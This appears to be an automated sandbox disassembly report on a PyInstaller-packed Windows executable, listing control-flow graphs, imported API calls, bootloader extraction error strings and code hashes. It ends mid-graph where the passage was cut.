                                                                                          • Not Executed
                                                                                          control_flow_graph 935 7ff6ceb46dcc-7ff6ceb46e01 call 7ff6ceb464d8 call 7ff6ceb464e0 call 7ff6ceb46548 942 7ff6ceb46e07-7ff6ceb46e12 call 7ff6ceb464e8 935->942 943 7ff6ceb46f3f-7ff6ceb46fad call 7ff6ceb3b6b8 call 7ff6ceb423d0 935->943 942->943 948 7ff6ceb46e18-7ff6ceb46e23 call 7ff6ceb46518 942->948 954 7ff6ceb46fbb-7ff6ceb46fbe 943->954 955 7ff6ceb46faf-7ff6ceb46fb6 943->955 948->943 956 7ff6ceb46e29-7ff6ceb46e4c call 7ff6ceb3b700 GetTimeZoneInformation 948->956 959 7ff6ceb46fc0 954->959 960 7ff6ceb46ff5-7ff6ceb47008 call 7ff6ceb3e3ac 954->960 958 7ff6ceb4704b-7ff6ceb4704e 955->958 966 7ff6ceb46f14-7ff6ceb46f3e call 7ff6ceb464d0 call 7ff6ceb464c0 call 7ff6ceb464c8 956->966 967 7ff6ceb46e52-7ff6ceb46e73 956->967 963 7ff6ceb46fc3 call 7ff6ceb46dcc 958->963 964 7ff6ceb47054-7ff6ceb4705c call 7ff6ceb46b50 958->964 959->963 971 7ff6ceb4700a 960->971 972 7ff6ceb47013-7ff6ceb4702e call 7ff6ceb423d0 960->972 976 7ff6ceb46fc8-7ff6ceb46ff4 call 7ff6ceb3b700 call 7ff6ceb2c010 963->976 964->976 973 7ff6ceb46e7e-7ff6ceb46e85 967->973 974 7ff6ceb46e75-7ff6ceb46e7b 967->974 977 7ff6ceb4700c-7ff6ceb47011 call 7ff6ceb3b700 971->977 991 7ff6ceb47030-7ff6ceb47033 972->991 992 7ff6ceb47035-7ff6ceb47047 call 7ff6ceb3b700 972->992 978 7ff6ceb46e99 973->978 979 7ff6ceb46e87-7ff6ceb46e8f 973->979 974->973 977->959 983 7ff6ceb46e9b-7ff6ceb46f0f call 7ff6ceb4b580 * 4 call 7ff6ceb439ac call 7ff6ceb47064 * 2 978->983 979->978 985 7ff6ceb46e91-7ff6ceb46e97 979->985 983->966 985->983 991->977 992->958
                                                                                          APIs
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46DFA
                                                                                            • Part of subcall function 00007FF6CEB46548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4655C
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46E0B
                                                                                            • Part of subcall function 00007FF6CEB464E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB464FC
                                                                                          • _get_daylight.LIBCMT ref: 00007FF6CEB46E1C
                                                                                            • Part of subcall function 00007FF6CEB46518: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CEB4652C
                                                                                            • Part of subcall function 00007FF6CEB3B700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
                                                                                            • Part of subcall function 00007FF6CEB3B700: GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720
                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6CEB4705C), ref: 00007FF6CEB46E43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                          • API String ID: 2248164782-239921721
                                                                                          • Opcode ID: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                                                          • Instruction ID: 4db8121a0f46287ed4929fc3b31b393909a4c929bbd47c8072d532601ad8cea9
                                                                                          • Opcode Fuzzy Hash: 3ce9ff365909c35cfda0cd92fd9b5c2b6ab9c6a7c0cfccc6144e1dd1acbf6dd4
                                                                                          • Instruction Fuzzy Hash: C7517D32A1864386F724DF21EA911B9A774BF6A785F444136FACDE3A99DF3CE4408740
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $header crc mismatch$unknown header flags set
                                                                                          • API String ID: 0-1127688429
                                                                                          • Opcode ID: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
                                                                                          • Instruction ID: b572e1b2acb22f65a8ce4b1a20d0ff03dde23bffdedb956691341f65fe863de9
                                                                                          • Opcode Fuzzy Hash: a8b055446104684f1ad95e328151202d31fdc591d47a14639da6131c49358b20
                                                                                          • Instruction Fuzzy Hash: 5BF18372A183D64BE7958F14C28CA3E3AB9EF76745F064538EA89A7790CF38E544C740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID:
                                                                                          • API String ID: 2295610775-0
                                                                                          • Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                                                          • Instruction ID: 01b4d53bc2fa9a94c3cf7c52613c0be143ece4e82bebe56359f828daf3876e9d
                                                                                          • Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                                                          • Instruction Fuzzy Hash: 8DF08122A1878287F7A08F64E5897767360EB65765F04063AE6AD666D4DF3CE0088A00
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: incorrect header check$invalid window size
                                                                                          • API String ID: 0-900081337
                                                                                          • Opcode ID: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
                                                                                          • Instruction ID: 73f9f9c2113f0ef0a546f35573f54dcc3921e4ac8b856cd9cd2ff12c95cf73c2
                                                                                          • Opcode Fuzzy Hash: 7b159ed6ab11f424a85810e34fe73a423a8b15e185d016247a9cbb34ea0f7710
                                                                                          • Instruction Fuzzy Hash: 8F91C472A182C687E7A58E14D58CB7E3AB9FF75341F115139EA9AA6790CF38E540CB00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 1010374628-0
                                                                                          • Opcode ID: b07a4aa98c3ea62428db7ff75e9c78d2acc70f0ed8e8990dbcc6d64e325556f5
                                                                                          • Instruction ID: 1ccf345457a493c03fb61e28dd0893d0f59b125b629138fab5ec4cc8cb3587c8
                                                                                          • Opcode Fuzzy Hash: b07a4aa98c3ea62428db7ff75e9c78d2acc70f0ed8e8990dbcc6d64e325556f5
                                                                                          • Instruction Fuzzy Hash: 1E02B323E1D64641FE55AF21974127926B4AF23BA2F444636FEDDE73D2DE3CA402A310

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 7ff6ceb21700-7ff6ceb21714 1 7ff6ceb21716-7ff6ceb2172d call 7ff6ceb22b10 0->1 2 7ff6ceb2172e-7ff6ceb21732 0->2 4 7ff6ceb21758-7ff6ceb2177b call 7ff6ceb27e20 2->4 5 7ff6ceb21734-7ff6ceb2173d call 7ff6ceb212a0 2->5 13 7ff6ceb217a9-7ff6ceb217c4 call 7ff6ceb24060 4->13 14 7ff6ceb2177d-7ff6ceb217a8 call 7ff6ceb22870 4->14 11 7ff6ceb2174f-7ff6ceb21757 5->11 12 7ff6ceb2173f-7ff6ceb2174a call 7ff6ceb22b10 5->12 12->11 20 7ff6ceb217c6-7ff6ceb217d9 call 7ff6ceb22b10 13->20 21 7ff6ceb217de-7ff6ceb217f1 call 7ff6ceb31004 13->21 26 7ff6ceb2191f-7ff6ceb21922 call 7ff6ceb3097c 20->26 27 7ff6ceb21813-7ff6ceb21817 21->27 28 7ff6ceb217f3-7ff6ceb2180e call 7ff6ceb22870 21->28 34 7ff6ceb21927-7ff6ceb2193e 26->34 31 7ff6ceb21819-7ff6ceb21825 call 7ff6ceb21050 27->31 32 7ff6ceb21831-7ff6ceb21851 call 7ff6ceb35780 27->32 37 7ff6ceb21917-7ff6ceb2191a call 7ff6ceb3097c 28->37 38 7ff6ceb2182a-7ff6ceb2182c 31->38 41 7ff6ceb21853-7ff6ceb2186d call 7ff6ceb22870 32->41 42 7ff6ceb21872-7ff6ceb21878 32->42 37->26 38->37 49 7ff6ceb2190d-7ff6ceb21912 41->49 43 7ff6ceb2187e-7ff6ceb21887 42->43 44 7ff6ceb21905-7ff6ceb21908 call 7ff6ceb3576c 42->44 47 7ff6ceb21890-7ff6ceb218b2 call 7ff6ceb30ccc 43->47 44->49 52 7ff6ceb218e5-7ff6ceb218ec 47->52 53 7ff6ceb218b4-7ff6ceb218cc call 7ff6ceb3140c 47->53 49->37 55 7ff6ceb218f3-7ff6ceb218fb call 7ff6ceb22870 52->55 58 7ff6ceb218ce-7ff6ceb218d1 53->58 59 7ff6ceb218d5-7ff6ceb218e3 53->59 62 7ff6ceb21900 55->62 58->47 61 7ff6ceb218d3 58->61 59->55 61->62 62->44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                          • API String ID: 2030045667-3833288071
                                                                                          • Opcode ID: dd6ade43e75c03bffe1577d39ea6a44076d23661ebe81191c2522cbc4993ce90
                                                                                          • Instruction ID: 99e6d6dc1a747d761f5e56cac2a463542b004365e77e08e9885f250a5a6d1b9a
                                                                                          • Opcode Fuzzy Hash: dd6ade43e75c03bffe1577d39ea6a44076d23661ebe81191c2522cbc4993ce90
                                                                                          • Instruction Fuzzy Hash: F9519E62B08A4292FA119F15E6482B963B1BF76BD2F444031FE8DEB6A5DF3CF5458700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _fread_nolock$Message
                                                                                          • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                          • API String ID: 677216364-1384898525
                                                                                          • Opcode ID: f57c7b85b9d6d8ab6ed12c8726bb5d2e90ccc7f7b80064200947aedb9a24219d
                                                                                          • Instruction ID: 7b81346371cb39f5964e53cfe087686f54bca7108c51b86d3a3019c1eb4a0b2e
                                                                                          • Opcode Fuzzy Hash: f57c7b85b9d6d8ab6ed12c8726bb5d2e90ccc7f7b80064200947aedb9a24219d
                                                                                          • Instruction Fuzzy Hash: BF51A172B09A4286EB14CF24D65917837B0EF6AB86F518136EA8CD7795DE3CE440CB44

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                          • String ID: CreateProcessW$Error creating child process!
                                                                                          • API String ID: 2895956056-3524285272
                                                                                          • Opcode ID: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                                                          • Instruction ID: a255a4bac5b3d592e71e6d42f97646b905adcc9a9ffbcc3009d08bf2f32e4f5a
                                                                                          • Opcode Fuzzy Hash: b7abaf37a347f063a3628d3e0586489636cc93df3d8b7db5f5a9dd5ff1266243
                                                                                          • Instruction Fuzzy Hash: 59413332A0878282EA209F64E5452BAB3A0FFA5765F400736F6ED977D9DF7CD0448B40

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 511 7ff6ceb21050-7ff6ceb210ab call 7ff6ceb2b840 514 7ff6ceb210ad-7ff6ceb210d2 call 7ff6ceb22b10 511->514 515 7ff6ceb210d3-7ff6ceb210eb call 7ff6ceb35780 511->515 520 7ff6ceb21109-7ff6ceb21119 call 7ff6ceb35780 515->520 521 7ff6ceb210ed-7ff6ceb21104 call 7ff6ceb22870 515->521 527 7ff6ceb21137-7ff6ceb21149 520->527 528 7ff6ceb2111b-7ff6ceb21132 call 7ff6ceb22870 520->528 526 7ff6ceb21264-7ff6ceb21279 call 7ff6ceb2b520 call 7ff6ceb3576c * 2 521->526 543 7ff6ceb2127e-7ff6ceb21298 526->543 530 7ff6ceb21150-7ff6ceb21175 call 7ff6ceb30ccc 527->530 528->526 537 7ff6ceb2117b-7ff6ceb21185 call 7ff6ceb30a40 530->537 538 7ff6ceb2125c 530->538 537->538 544 7ff6ceb2118b-7ff6ceb21197 537->544 538->526 545 7ff6ceb211a0-7ff6ceb211c8 call 7ff6ceb29c80 544->545 548 7ff6ceb211ca-7ff6ceb211cd 545->548 549 7ff6ceb21241-7ff6ceb21257 call 7ff6ceb22b10 545->549 550 7ff6ceb2123c 548->550 551 7ff6ceb211cf-7ff6ceb211d9 548->551 549->538 550->549 553 7ff6ceb211db-7ff6ceb211e8 call 7ff6ceb3140c 551->553 554 7ff6ceb21203-7ff6ceb21206 551->554 560 7ff6ceb211ed-7ff6ceb211f0 553->560 555 7ff6ceb21219-7ff6ceb2121e 554->555 556 7ff6ceb21208-7ff6ceb21216 call 7ff6ceb4aee0 554->556 555->545 559 7ff6ceb21220-7ff6ceb21223 555->559 556->555 562 7ff6ceb21237-7ff6ceb2123a 559->562 563 7ff6ceb21225-7ff6ceb21228 559->563 564 7ff6ceb211fe-7ff6ceb21201 560->564 565 7ff6ceb211f2-7ff6ceb211fc call 7ff6ceb30a40 560->565 562->538 563->549 566 7ff6ceb2122a-7ff6ceb21232 563->566 564->549 565->555 565->564 566->530
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                          • API String ID: 2030045667-2813020118
                                                                                          • Opcode ID: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
                                                                                          • Instruction ID: aea5955dba03efff4a575959e4fee0f31840001fa9602aa96380802c96fc277f
                                                                                          • Opcode Fuzzy Hash: 0889a6de986b29688c85be3cab4202d9240b690e7679539d892e7d762bdcbe91
                                                                                          • Instruction Fuzzy Hash: 8E51C323A0968281EA609F51A6443BA62B1FFB6B96F444131FECDE7785EF3CE545C700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF6CEB3FD5A,?,?,-00000018,00007FF6CEB3BB0B,?,?,?,00007FF6CEB3BA02,?,?,?,00007FF6CEB3698E), ref: 00007FF6CEB3FB3C
                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF6CEB3FD5A,?,?,-00000018,00007FF6CEB3BB0B,?,?,?,00007FF6CEB3BA02,?,?,?,00007FF6CEB3698E), ref: 00007FF6CEB3FB48
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeLibraryProc
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3013587201-537541572
                                                                                          • Opcode ID: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                          • Instruction ID: 90f385a6179212c8a108cb8057248637f3b1e781b1fa05237503b5d116b6d39c
                                                                                          • Opcode Fuzzy Hash: 92e1c6cccb7ec25b4476ca22e51d2624e921c13e1215ab17a1d429f3080250c2
                                                                                          • Instruction Fuzzy Hash: 2B41E372B19A0342FA16DF16AA165B622B2BF26B91F0D4135ED8DE7794EF3CE4458300

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 822 7ff6ceb3c80c-7ff6ceb3c832 823 7ff6ceb3c84d-7ff6ceb3c851 822->823 824 7ff6ceb3c834-7ff6ceb3c848 call 7ff6ceb35c94 call 7ff6ceb35cb4 822->824 826 7ff6ceb3cc27-7ff6ceb3cc33 call 7ff6ceb35c94 call 7ff6ceb35cb4 823->826 827 7ff6ceb3c857-7ff6ceb3c85e 823->827 842 7ff6ceb3cc3e 824->842 844 7ff6ceb3cc39 call 7ff6ceb3b698 826->844 827->826 830 7ff6ceb3c864-7ff6ceb3c892 827->830 830->826 831 7ff6ceb3c898-7ff6ceb3c89f 830->831 834 7ff6ceb3c8b8-7ff6ceb3c8bb 831->834 835 7ff6ceb3c8a1-7ff6ceb3c8b3 call 7ff6ceb35c94 call 7ff6ceb35cb4 831->835 840 7ff6ceb3c8c1-7ff6ceb3c8c7 834->840 841 7ff6ceb3cc23-7ff6ceb3cc25 834->841 835->844 840->841 846 7ff6ceb3c8cd-7ff6ceb3c8d0 840->846 845 7ff6ceb3cc41-7ff6ceb3cc58 841->845 842->845 844->842 846->835 849 7ff6ceb3c8d2-7ff6ceb3c8f7 846->849 851 7ff6ceb3c8f9-7ff6ceb3c8fb 849->851 852 7ff6ceb3c92a-7ff6ceb3c931 849->852 855 7ff6ceb3c8fd-7ff6ceb3c904 851->855 856 7ff6ceb3c922-7ff6ceb3c928 851->856 853 7ff6ceb3c906-7ff6ceb3c91d call 7ff6ceb35c94 call 7ff6ceb35cb4 call 7ff6ceb3b698 852->853 854 7ff6ceb3c933-7ff6ceb3c95b call 7ff6ceb3e3ac call 7ff6ceb3b700 * 2 852->854 883 7ff6ceb3cab0 853->883 885 7ff6ceb3c978-7ff6ceb3c9a3 call 7ff6ceb3d034 854->885 886 7ff6ceb3c95d-7ff6ceb3c973 call 7ff6ceb35cb4 call 7ff6ceb35c94 854->886 855->853 855->856 857 7ff6ceb3c9a8-7ff6ceb3c9bf 856->857 860 7ff6ceb3ca3a-7ff6ceb3ca44 call 7ff6ceb4476c 857->860 861 7ff6ceb3c9c1-7ff6ceb3c9c9 857->861 872 7ff6ceb3ca4a-7ff6ceb3ca5f 860->872 873 7ff6ceb3cace 860->873 861->860 864 7ff6ceb3c9cb-7ff6ceb3c9cd 861->864 864->860 870 7ff6ceb3c9cf-7ff6ceb3c9e5 864->870 870->860 875 7ff6ceb3c9e7-7ff6ceb3c9f3 870->875 872->873 877 7ff6ceb3ca61-7ff6ceb3ca73 GetConsoleMode 872->877 881 7ff6ceb3cad3-7ff6ceb3caf3 ReadFile 873->881 875->860 879 7ff6ceb3c9f5-7ff6ceb3c9f7 875->879 877->873 882 7ff6ceb3ca75-7ff6ceb3ca7d 877->882 879->860 884 7ff6ceb3c9f9-7ff6ceb3ca11 879->884 887 7ff6ceb3caf9-7ff6ceb3cb01 881->887 888 7ff6ceb3cbed-7ff6ceb3cbf6 GetLastError 881->888 882->881 891 7ff6ceb3ca7f-7ff6ceb3caa1 ReadConsoleW 882->891 894 7ff6ceb3cab3-7ff6ceb3cabd call 7ff6ceb3b700 883->894 884->860 895 7ff6ceb3ca13-7ff6ceb3ca1f 884->895 885->857 886->883 887->888 889 7ff6ceb3cb07 887->889 892 7ff6ceb3cbf8-7ff6ceb3cc0e call 7ff6ceb35cb4 call 7ff6ceb35c94 888->892 893 7ff6ceb3cc13-7ff6ceb3cc16 888->893 897 7ff6ceb3cb0e-7ff6ceb3cb23 889->897 899 7ff6ceb3caa3 GetLastError 891->899 900 7ff6ceb3cac2-7ff6ceb3cacc 891->900 892->883 904 7ff6ceb3caa9-7ff6ceb3caab call 7ff6ceb35c28 893->904 905 7ff6ceb3cc1c-7ff6ceb3cc1e 893->905 894->845 895->860 903 7ff6ceb3ca21-7ff6ceb3ca23 895->903 897->894 907 7ff6ceb3cb25-7ff6ceb3cb30 897->907 899->904 900->897 903->860 911 7ff6ceb3ca25-7ff6ceb3ca35 903->911 904->883 905->894 914 7ff6ceb3cb57-7ff6ceb3cb5f 907->914 915 7ff6ceb3cb32-7ff6ceb3cb4b call 7ff6ceb3c424 907->915 911->860 918 7ff6ceb3cbdb-7ff6ceb3cbe8 call 7ff6ceb3c264 914->918 919 7ff6ceb3cb61-7ff6ceb3cb73 914->919 922 7ff6ceb3cb50-7ff6ceb3cb52 915->922 918->922 923 